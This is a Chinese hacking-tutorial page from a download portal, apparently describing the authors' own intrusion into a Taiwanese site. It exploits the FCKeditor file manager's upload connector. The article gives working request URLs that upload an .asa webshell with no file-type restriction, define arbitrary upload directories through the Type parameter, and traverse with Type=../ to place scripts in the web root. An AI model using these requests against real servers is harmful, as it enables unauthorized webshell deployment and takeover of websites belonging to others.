首 页
┆
源码下载
┆
IT学院
┆
字体下载
┆
模板下载
┆
源码发布
┆
广告合作
┆
网站地图
┆
虚拟主机
┆
中文域名
►
设为首页
►
加入收藏
►
联系我们
源码下载
>>
ASP源码
|
PHP源码
|
ASP.net源码
|
JSP源码
|
CGI源码
|
VC/C++源码
|
VB源码
|
Delphi源码
|
Flash源码
文章学院
>>
网络编程
|
网页设计
|
图形图象
|
数据库
|
服务器
|
网络媒体
|
网络安全
|
操作系统
|
办公软件
|
软件开发
|
黑客知识
字体下载
>>
精制字体
|
非英字体
|
艺术字体
|
著名字体
|
哥特式
|
简单字体
|
手写体
|
节假日
|
图案字体
|
精度像素
|
中文字体
模板下载
>>
企业门户
|
数码网络
|
休闲娱乐
|
影视音乐
|
旅游名胜
|
文化艺术
|
电子商务
|
个性展示
|
登陆导航
|
Flash模板
源码搜索
文章搜索
字体搜索
模板搜索
►►
您当前的位置:
源码园
→
IT学院
→
黑客知识
→
黑客进阶
→ 文章内容
FCKeditor的入侵心得体会--FCKeditor,入侵,心得体会
作者:佚名 来源:网上收集 发布时间:2006-10-28 22:29:42
晚上和宝看个台湾的站,后台套用的是FCKeditor的系统.
这貌似是个全世界都在用的编辑系统,什么韩国日本台湾美国的站都在用
再入侵的时候,宝发现的心得我记录下:
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,我和宝上传的是.asa的,在编辑器的目录下正常的显示出了马.
但一时间找不到上传地址,后来经过推断,确定马儿上传到的位置是:
http://www.xxx.tw/UserFiles/all/1.asa
经过我们的思路整理,得出了 "Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
比如输入:
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=cnandbaol&Connector=connectors/asp/connector.asp
所传的文件就到了 http://www.xxx.tw/UserFiles/cnandbao/下了
经过进一步的考虑,
如果这样输入:http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
就可以传到网站的根目录下,这样只要网站支持什么脚本,你传什么脚本的马就可以了.
所传的文件就到了网站根目录下了
[] [
返回上一页
] [
打 印
]
上一篇文章:
eWebArticle: 极限文章管理系统漏洞--eWebArticle,极限文章管理系统,漏洞
下一篇文章:
破解|利器|ollydbg|教学|Run trace--破解,利器,ollydbg,教学,Run trace
相关文章:
FCKeditor的入侵心得体会--FCKeditor,入侵,心得体会...
[组图]
慢工出细活 -- 黑白照片上色的几点心得体会
用Fireworks制作Logo心得体会
[Java]让FCKEditor支持动态设置文件目录
FCKeditor编辑器在JAVA中的使用与配置
在JSP环境中配置使用fckeditor详细讲解
使用FCKEditor的设置技巧(ASP篇)
关于本站
-
网站帮助
-
广告合作
-
下载声明
-
友情连接
-
网站地图
-
源码发布
Copyright © 2003-2009
Ymyasp
.Com
. All Rights Reserved .
备案序号:粤ICP备07029071号